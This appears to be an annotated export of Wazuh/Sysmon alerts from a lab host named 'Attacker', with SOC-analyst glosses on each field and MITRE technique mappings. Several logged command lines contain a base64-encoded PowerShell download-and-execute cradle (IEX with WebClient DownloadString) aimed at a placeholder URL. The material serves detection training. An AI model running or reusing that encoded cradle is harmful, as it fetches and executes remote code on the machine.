data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c19e-680a-fd0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9136
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:36.201+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:36.201+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  135
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535396.2877259
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:33.9223709Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350867
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:33.902 ProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} ProcessId: 10052 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mhldo5qe.xqb.ps1 CreationUtcTime: 2025-04-24 22:56:33.902 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:33.902
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a0-680a-ff0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mhldo5qe.xqb.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:33.902
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:40.115+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:40.115+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  132
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535400.2880028
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:38.1224674Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350907
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:35.370 ProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00} ProcessId: 3616 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} ParentProcessId: 10052 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:35.370
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a3-680a-010d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1a0-680a-ff0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:40.932+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:40.932+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  136
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535400.2888095
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:38.6009870Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350913
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:38.564 ProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00} ProcessId: 3616 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_alhca2xx.ivy.ps1 CreationUtcTime: 2025-04-24 22:56:38.561 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:38.564
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a3-680a-010d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_alhca2xx.ivy.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:38.561
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:43.484+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:43.484+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  133
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535403.2890860
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:41.3926518Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350943
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:39.935 ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} ProcessId: 12292 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00} ParentProcessId: 3616 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:39.935
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a7-680a-040d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
